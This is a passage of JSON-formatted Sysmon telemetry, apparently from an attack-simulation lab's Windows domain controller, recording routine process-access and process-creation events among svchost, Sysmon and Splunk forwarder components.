08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6861,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6862,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.679\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nTargetProcessId: 2232\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.679","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","TargetProcessId":"2232","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6863,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:44.820\r\nSourceProcessGUID: {41C8662E-221C-5F25-0000-001017FB0A00}\r\nSourceProcessId: 2232\r\nSourceThreadId: 4948\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:44.820","SourceProcessGUID":"{41C8662E-221C-5F25-0000-001017FB0A00}","SourceProcessId":"2232","SourceThreadId":"4948","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6864,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.805\r\nProcessGuid: {41C8662E-221D-5F25-0000-001072FD0A00}\r\nProcessId: 2740\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:45.805","ProcessGuid":"{41C8662E-221D-5F25-0000-001072FD0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6865,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:45.804\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-221D-5F25-0000-001072FD0A00}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program 